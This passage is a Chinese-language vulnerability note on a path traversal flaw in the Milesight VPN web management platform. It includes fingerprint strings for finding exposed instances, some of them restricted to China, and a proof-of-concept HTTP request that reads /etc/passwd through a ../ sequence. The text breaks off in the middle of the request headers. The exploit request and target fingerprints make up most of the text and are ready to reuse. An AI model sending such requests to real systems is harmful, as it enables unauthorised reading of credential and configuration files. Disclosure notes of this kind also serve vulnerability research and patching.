漏洞描述
Milesight VPN是中国星纵物联(Milesight)公司的一个基于 Web 的 VPN 监控和管理平台。 Milesight VPN 存在路径遍历漏洞。攻击者利用该漏洞通过特制的网络请求可以读取任意文件,如passwd,数据库配置文件等。
漏洞指纹
body=”glyphicon-remove” && body=”$randdt;” && country=”CN”
“MilesightVPN”
漏洞复现
poc:
读取passwd文件
GET /../../../../../../../../../../../etc/passwd HTTP/1.1
Host: 127.0.0.1:8001
Connection: keep-alive
Cache-Control: max-age=0
sec-ch-ua: ";Not A Brand";v="99", "Chromium";v&